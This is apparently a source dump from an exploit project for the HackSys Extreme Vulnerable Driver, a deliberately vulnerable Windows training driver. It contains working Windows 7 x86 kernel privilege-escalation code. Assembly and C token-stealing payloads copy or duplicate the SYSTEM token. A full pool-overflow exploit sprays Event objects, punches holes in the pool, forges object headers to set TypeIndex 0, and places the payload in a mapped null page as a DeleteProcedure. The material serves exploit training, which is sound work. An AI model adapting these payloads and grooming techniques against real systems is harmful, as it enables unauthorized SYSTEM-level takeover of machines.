        mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process (current _EPROCESS)

        mov ecx, eax ; Keep current process _EPROCESS in ECX for the final write

        mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
        sub eax, FLINK_OFFSET ; Flink points into the next _EPROCESS; rebase to its start
        cmp [eax + PID_OFFSET], edx ; nt!_EPROCESS.UniqueProcessId == SYSTEM_PID ?
        jne SearchSystemPID ; The list is circular: this never terminates if no PID 4 exists

        mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
        ; with SYSTEM process nt!_EPROCESS.Token
        ; NOTE(review): copies the raw Token field (an EX_FAST_REF) without
        ; taking a reference on the token object.
        ; End of Token Stealing Stub

        popad ; Restore registers state

        ; Kernel Recovery Stub
        mov eax, 0x1 ; Return value handed back to the kernel caller (see header comment)
    }
}
208 |
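#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// C-language privilege-escalation payload: instead of patching _EPROCESS.Token
// directly, it opens the SYSTEM process, duplicates its primary token and
// assigns the duplicate to the current process through the documented
// ZwSetInformationProcess(ProcessAccessToken) path.
//
// Steps:
//   1. Open a handle to the SYSTEM process (PID SYSTEM_PID).
//   2. Open that process's token.
//   3. Duplicate it as a primary token.
//   4. Clear PrimaryTokenFrozen on our own _EPROCESS and assign the new token.
//
// Every Zw* call is now checked: on the first failure the routine skips the
// remaining steps and only closes whatever handles were opened, instead of
// feeding a NULL handle into the next call (which is what the unchecked
// version did). The interface stays VOID, so callers cannot observe failure
// other than by checking their privileges afterwards.
//
// Relies on kernel-mode declarations (CLIENT_ID, PEPROCESS with a visible
// PrimaryTokenFrozen member, the Zw* prototypes) supplied by Common.h; those
// are not visible here and are specific to this project's headers.
//
// Examples:
// http://j00ru.vexillium.org/?p=1272
// http://www.wasm.ru/forum/viewtopic.php?id=29591
VOID TokenStealingPayloadDuplicateToken() {
    HMODULE hModule = NULL;
    CLIENT_ID ClientId = { 0 };
    HANDLE hSystemProcess = NULL;
    PEPROCESS CurrentProcess = NULL;
    HANDLE hSystemProcessToken = NULL;
    HANDLE hNewPrivilegedToken = NULL;
    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
    PROCESS_ACCESS_TOKEN AccessToken = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };

    (void)hModule;

    // Same SYSTEM PID the assembly stubs use (Payloads.h).
    ClientId.UniqueProcess = (HANDLE)SYSTEM_PID;

    // 1. Handle to the SYSTEM process.
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    NtStatus = ZwOpenProcess(&hSystemProcess, GENERIC_ALL, &ObjectAttributes, &ClientId);
    if (!NT_SUCCESS(NtStatus)) {
        goto Cleanup;
    }

    // 2. SYSTEM's primary token.
    NtStatus = ZwOpenProcessToken(hSystemProcess, GENERIC_ALL, &hSystemProcessToken);
    if (!NT_SUCCESS(NtStatus)) {
        goto Cleanup;
    }

    // 3. Duplicate it as a primary token we can assign to ourselves.
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    NtStatus = ZwDuplicateToken(hSystemProcessToken,
                                TOKEN_ALL_ACCESS,
                                &ObjectAttributes,
                                TRUE,
                                TokenPrimary,
                                &hNewPrivilegedToken);
    if (!NT_SUCCESS(NtStatus)) {
        goto Cleanup;
    }

    AccessToken.Token = hNewPrivilegedToken;

    // 4. Fix the issue with PrimaryTokenFrozen: the original author clears
    // this _EPROCESS flag so the assignment below is accepted — presumably
    // the kernel refuses to replace a frozen primary token. This writes a
    // kernel structure directly and depends on the project's _EPROCESS
    // definition matching the running build.
    CurrentProcess = PsGetCurrentProcess();
    CurrentProcess->PrimaryTokenFrozen = 0;

    // GetCurrentProcess() yields the current-process pseudo-handle, which the
    // Zw* layer accepts for the caller's own process.
    NtStatus = ZwSetInformationProcess(GetCurrentProcess(),
                                       ProcessAccessToken,
                                       &AccessToken,
                                       sizeof(AccessToken));

Cleanup:
    // Close in reverse order of acquisition; each handle is NULL unless the
    // corresponding step succeeded.
    if (hNewPrivilegedToken) {
        ZwClose(hNewPrivilegedToken);
    }

    if (hSystemProcessToken) {
        ZwClose(hSystemProcessToken);
    }

    if (hSystemProcess) {
        ZwClose(hSystemProcess);
    }
}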
268 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Payloads.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Payloads.h
43 |
44 | Abstract:
45 | This module implements the data structures used by EoP payload.
46 |
47 | --*/
48 |
49 | #ifndef __PAYLOADS_H__
50 | #define __PAYLOADS_H__
51 |
52 | #pragma once
53 |
54 | #include "Common.h"
55 |
// Windows 7 SP1 x86 Offsets
//
// Every offset below is hard-coded for the test bed named in Payloads.c.
// On any other kernel build (or on x64) the token-stealing stubs read and
// write the wrong fields and will most likely bug-check the machine; the
// values must be re-derived from the target's symbols before reuse.
#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PrcbData.CurrentThread (read through FS in kernel mode)
#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token (an EX_FAST_REF; the stubs copy it verbatim)
#define SYSTEM_PID 0x004 // SYSTEM Process PID

// Assembly payloads (token stealing); they differ only in how — or whether —
// they repair the kernel stack before returning.
VOID TokenStealingPayloadWin7(); // hand-unwinds one specific hijacked frame (add esp,12 / ret 8)
VOID TokenStealingPayladGSWin7(); // /GS variant: climbs fixed stack offsets before returning (name typo is part of the public interface)
VOID TokenStealingPayloadWin7Generic(); // no kernel recovery; returns to the caller normally
VOID TokenStealingPayloadDuplicateToken(); // C variant built on ZwOpenProcess / ZwDuplicateToken / ZwSetInformationProcess
VOID TokenStealingPayloadPoolOverflowWin7(); // used as a forged DeleteProcedure by PoolOverflowThread; sets EAX = 1
69 |
70 | #endif //__PAYLOADS_H__
71 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/PoolOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | PoolOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Pool Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "PoolOverflow.h"
52 |
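// Groom NonPaged pool with Event objects.
//
// Creates an Event for every slot of EventObjectArrayA and then of
// EventObjectArrayB, storing the handles so they can be closed later. Array A
// is intended as a bulk spray that soaks up pre-existing free chunks; array B
// is the region in which CreateHolesInNonPagedPoolByCoalescingEventObjects
// later punches holes for the vulnerable allocation.
//
// Loop bounds are derived from the array declarations in PoolOverflow.h so
// they cannot drift from them. On the first CreateEvent failure the whole
// process is terminated with exit(); handles created so far are released by
// process teardown.
VOID SprayNonPagedPoolWithEventObjects() {
    const UINT32 CountA = sizeof(EventObjectArrayA) / sizeof(EventObjectArrayA[0]);
    const UINT32 CountB = sizeof(EventObjectArrayB) / sizeof(EventObjectArrayB[0]);
    UINT32 i = 0;

    RtlFillMemory(EventObjectArrayA, sizeof(EventObjectArrayA), 0x0);
    RtlFillMemory(EventObjectArrayB, sizeof(EventObjectArrayB), 0x0);

    // Bulk spray.
    for (i = 0; i < CountA; i++) {
        EventObjectArrayA[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

        if (!EventObjectArrayA[i]) {
            DEBUG_ERROR("\t\t[-] Failed To Allocate Event Objects: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
    }

    // Region that will be turned into holes.
    for (i = 0; i < CountB; i++) {
        EventObjectArrayB[i] = CreateEvent(NULL, FALSE, FALSE, NULL);

        if (!EventObjectArrayB[i]) {
            DEBUG_ERROR("\t\t[-] Failed To Allocate Event Objects: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
    }
}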
77 |
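// Punch holes into the sprayed region: out of every 16 consecutive Event
// objects in EventObjectArrayB, close the first 8 and keep the last 8.
//
// Closing 8 adjacent Event objects lets the pool allocator coalesce their
// chunks into one free block. On the Win7 SP1 x86 test bed an Event chunk is
// 0x40 bytes (this is also what the fake POOL_HEADER written by
// PoolOverflowThread encodes), so each hole is 0x200 bytes: exactly the
// 504-byte vulnerable allocation plus its 8-byte POOL_HEADER. The 8 Events
// kept after each hole are the objects the overflow then corrupts.
//
// FreeEventObjects closes the complementary half (indices 8..15 of each
// group), so no handle is closed twice. The loop bound is derived from the
// array declaration and the inner loop is clamped to it, so a spray size that
// is not a multiple of 16 cannot index past the array. Any CloseHandle
// failure terminates the process.
VOID CreateHolesInNonPagedPoolByCoalescingEventObjects() {
    const UINT32 CountB = sizeof(EventObjectArrayB) / sizeof(EventObjectArrayB[0]);
    UINT32 i = 0;
    UINT32 j = 0;

    for (i = 0; i < CountB; i += 16) {
        for (j = 0; j < 8 && i + j < CountB; j++) {
            if (!CloseHandle(EventObjectArrayB[i + j])) {
                DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
                exit(EXIT_FAILURE);
            }
        }
    }
}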
91 |
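// Release every Event handle that is still open: all of EventObjectArrayA and
// the second half (indices 8..15) of each 16-object group in
// EventObjectArrayB — the first half was already closed by
// CreateHolesInNonPagedPoolByCoalescingEventObjects.
//
// This is also what fires the payload: closing the last handle of the Event
// whose headers the overflow rewrote makes the kernel free that object, and
// with its TypeIndex forced to 0 the object's type (and DeleteProcedure) is
// resolved through the attacker-controlled null page set up by
// PoolOverflowThread.
//
// Loop bounds come from the array declarations; the inner loop is clamped so
// a spray size that is not a multiple of 16 cannot index past the array.
// Any CloseHandle failure terminates the process.
VOID FreeEventObjects() {
    const UINT32 CountA = sizeof(EventObjectArrayA) / sizeof(EventObjectArrayA[0]);
    const UINT32 CountB = sizeof(EventObjectArrayB) / sizeof(EventObjectArrayB[0]);
    UINT32 i = 0;
    UINT32 j = 0;

    for (i = 0; i < CountA; i++) {
        if (!CloseHandle(EventObjectArrayA[i])) {
            DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
    }

    // Start at 8: indices 0..7 of each group were closed when the holes were made.
    for (i = 8; i < CountB; i += 16) {
        for (j = 0; j < 8 && i + j < CountB; j++) {
            if (!CloseHandle(EventObjectArrayB[i + j])) {
                DEBUG_ERROR("\t\t[-] Failed To Close Event Objects Handle: 0x%X\n", GetLastError());
                exit(EXIT_FAILURE);
            }
        }
    }
}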
112 |
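// Exploit thread for HEVD's pool-overflow vulnerability (Windows 7 SP1 x86).
//
// Strategy, as implemented below:
//   1. Build a 544-byte user buffer: 504 bytes of filler (POOL_BUFFER_SIZE,
//      the size of the driver's vulnerable NonPaged pool allocation) followed
//      by 40 bytes (TYPE_INDEX_OVERWRITE) that spill into the chunk placed
//      right after it.
//   2. Map the null page and store the payload address at 0x60.
//   3. Groom NonPaged pool with Event objects and punch 0x200-byte holes so
//      the vulnerable allocation lands directly in front of an Event object.
//   4. Send the buffer to the driver; the 40 overflow bytes rewrite that
//      Event's POOL_HEADER and object headers and force its TypeIndex to 0.
//   5. Close the Event handles. Freeing the corrupted object resolves its
//      OBJECT_TYPE through TypeIndex 0 (index 0 of the kernel's object-type
//      table is NULL on this build, hence the mapped null page), whose
//      TypeInfo.DeleteProcedure slot at offset 0x60 now holds the payload.
//      The payload runs in kernel mode and swaps in the SYSTEM token.
//
// All pointer arithmetic uses ULONG casts and every constant is specific to
// x86 Windows 7 SP1; none of this works unmodified on other builds.
//
// Parameter: unused (CreateThread argument).
// Returns:   EXIT_SUCCESS as the thread exit code. Any failure calls exit(),
//            terminating the whole process.
DWORD WINAPI PoolOverflowThread(LPVOID Parameter) {
    ULONG BytesReturned = 0;
    HANDLE hFile = NULL;
    PVOID Memory = NULL;
    PULONG UserModeBuffer = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PVOID EopPayload = &TokenStealingPayloadPoolOverflowWin7;
    SIZE_T UserModeBufferSize = (ULONG)(POOL_BUFFER_SIZE + TYPE_INDEX_OVERWRITE);

    (void)Parameter;

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // Best effort: a higher priority makes the spray/hole/allocate
        // sequence less likely to be interleaved with other allocators.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

        // Allocate the Heap chunk
        UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
                                           HEAP_ZERO_MEMORY,
                                           UserModeBufferSize);

        if (!UserModeBuffer) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
        }

        DEBUG_INFO("\t\t[+] Mapping Null Page\n");

        // The forged OBJECT_TYPE lives at address 0; it must be mapped first.
        if (!MapNullPage()) {
            DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

        // Filler for the 504 in-bounds bytes (the overflow tail is overwritten below).
        RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);

        // Restore POOL_HEADER and set TypeIndex to 0x00 (TypeIndex is UChar)
        // The 40 overflow bytes rebuild the headers of the Event object that
        // follows the vulnerable chunk. The field names below are the Win7
        // SP1 x86 layout as understood by the original author; verify them
        // against the symbols of the target build before changing anything.
        Memory = (PVOID)((ULONG)UserModeBuffer + (ULONG)POOL_BUFFER_SIZE);
        *(PULONG)Memory = (ULONG)0x04080040; // POOL_HEADER: PreviousSize 0x40 (*8 = 0x200, the hole), BlockSize 8 (*8 = 0x40, one Event chunk)
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0xee657645; // POOL_HEADER.PoolTag "Even" with the protected-pool bit set on the last byte
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000000; // OBJECT_HEADER_QUOTA_INFO.PagedPoolCharge
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000040; // OBJECT_HEADER_QUOTA_INFO.NonPagedPoolCharge
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000000; // OBJECT_HEADER_QUOTA_INFO.SecurityDescriptorCharge
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000000; // OBJECT_HEADER_QUOTA_INFO.ExclusiveProcess
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000001; // OBJECT_HEADER.PointerCount
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000001; // OBJECT_HEADER.HandleCount
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00000000; // OBJECT_HEADER.Lock
        Memory = (PVOID)((ULONG)Memory + 0x4);
        *(PULONG)Memory = (ULONG)0x00080000; // OBJECT_HEADER: TypeIndex 0x00, TraceFlags 0x00, InfoMask 0x08 (quota info present), Flags 0x00

        DEBUG_INFO("\t\t\t[+] TypeIndex Of Event Object Set To: 0x0\n");

        DEBUG_INFO("\t\t[+] Preparing OBJECT_TYPE_INITIALIZER At Null Page\n");

        // Set the DeleteProcedure to the address of our payload.
        // 0x60 = OBJECT_TYPE.TypeInfo (+0x28) + OBJECT_TYPE_INITIALIZER.DeleteProcedure (+0x38) on this build.
        *(PULONG)0x00000060 = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] DeleteProcedure: 0x%X\n", *(PULONG)0x00000060);
        DEBUG_INFO("\t\t\t[+] DeleteProcedure Address: 0x%p\n", (ULONG)0x00000060);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_INFO("\t\t[+] Preparing NonPaged Kernel Pool Layout\n");

        DEBUG_INFO("\t\t\t[+] Spraying With Event Objects\n");

        // Spray the NonPaged Pool
        SprayNonPagedPoolWithEventObjects();

        DEBUG_INFO("\t\t\t[+] Creating Holes By Coalescing\n");

        // Create the holes for the vulnerable buffer
        CreateHolesInNonPagedPoolByCoalescingEventObjects();

        DEBUG_MESSAGE("\t[+] Triggering Pool Overflow\n");

        OutputDebugString("****************Kernel Mode****************\n");

        // Allocate the vulnerable buffer in one of the holes we created.
        // The result is only reported: the overflow itself happens inside
        // the driver regardless of the status it returns, and the payload is
        // triggered by the frees below, not by this call.
        if (!DeviceIoControl(hFile,
                             HACKSYS_EVD_IOCTL_POOL_OVERFLOW,
                             (LPVOID)UserModeBuffer,
                             (DWORD)UserModeBufferSize,
                             NULL,
                             0,
                             &BytesReturned,
                             NULL)) {
            DEBUG_ERROR("\t\t[-] DeviceIoControl Returned Failure: 0x%X\n", GetLastError());
        }

        OutputDebugString("****************Kernel Mode****************\n");

        DEBUG_INFO("\t\t[+] Triggering Payload\n");

        DEBUG_INFO("\t\t\t[+] Freeing Event Objects\n");

        // Free the NonPaged Pool (this is what invokes the forged DeleteProcedure)
        FreeEventObjects();

        HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);

        UserModeBuffer = NULL;

        // The device handle is no longer needed once the payload has run.
        CloseHandle(hFile);
        hFile = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() says nothing about a structured exception; report
        // the exception code itself (e.g. 0xC0000005 for an access violation).
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetExceptionCode());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}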
255 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/PoolOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | PoolOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Pool Overflow Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __POOL_OVERFLOW_H__
52 | #define __POOL_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// Number of in-bounds bytes handed to the driver's pool-overflow IOCTL; it
// corresponds to the size of the driver's vulnerable NonPaged pool allocation
// on the Win7 SP1 x86 test bed (the driver side is not visible in this file).
#define POOL_BUFFER_SIZE 504
// Bytes written past that allocation by PoolOverflowThread: a fake
// POOL_HEADER followed by the headers of the adjacent Event object, ending at
// the ULONG that carries its TypeIndex (10 ULONGs = 40 bytes).
#define TYPE_INDEX_OVERWRITE 40

// Event handles used to groom NonPaged pool: A is the bulk spray, B is the
// region in which holes are punched for the vulnerable allocation.
// NOTE(review): these are definitions, not extern declarations, so every
// translation unit that includes this header instantiates them; the C
// compiler merges them as common symbols, but the header should declare them
// extern and PoolOverflow.c should own the single definition.
HANDLE EventObjectArrayA[10000];
HANDLE EventObjectArrayB[5000];

VOID FreeEventObjects(); // closes all remaining Event handles; freeing the corrupted object fires the payload
VOID SprayNonPagedPoolWithEventObjects(); // fills both arrays with freshly created Events
DWORD WINAPI PoolOverflowThread(LPVOID Parameter); // exploit driver thread (Parameter unused)
VOID CreateHolesInNonPagedPoolByCoalescingEventObjects(); // closes 8 of every 16 Events in array B
68 |
69 | #endif //__POOL_OVERFLOW_H__
70 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/ArbitraryOverwrite.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/ArbitraryOverwrite.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Common.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/Common.obj
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Release/HackSysEVDExploit.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\ARBITRARYOVERWRITE.OBJ
2 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\cl.command.1.tlog
3 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\CL.read.1.tlog
4 | C:\HackSysExtremeVulnerableDriver\Exploit\Source\Release\CL.write.1.tlog
5 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\COMMON.OBJ
6 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.EXE
7 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.EXE.INTERMEDIATE.MANIFEST
8 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.OBJ
9 | C:\HACKSYSEXTREMEVULNERABLEDRIVER\EXPLOIT\SOURCE\RELEASE\HACKSYSEVDEXPLOIT.PDB
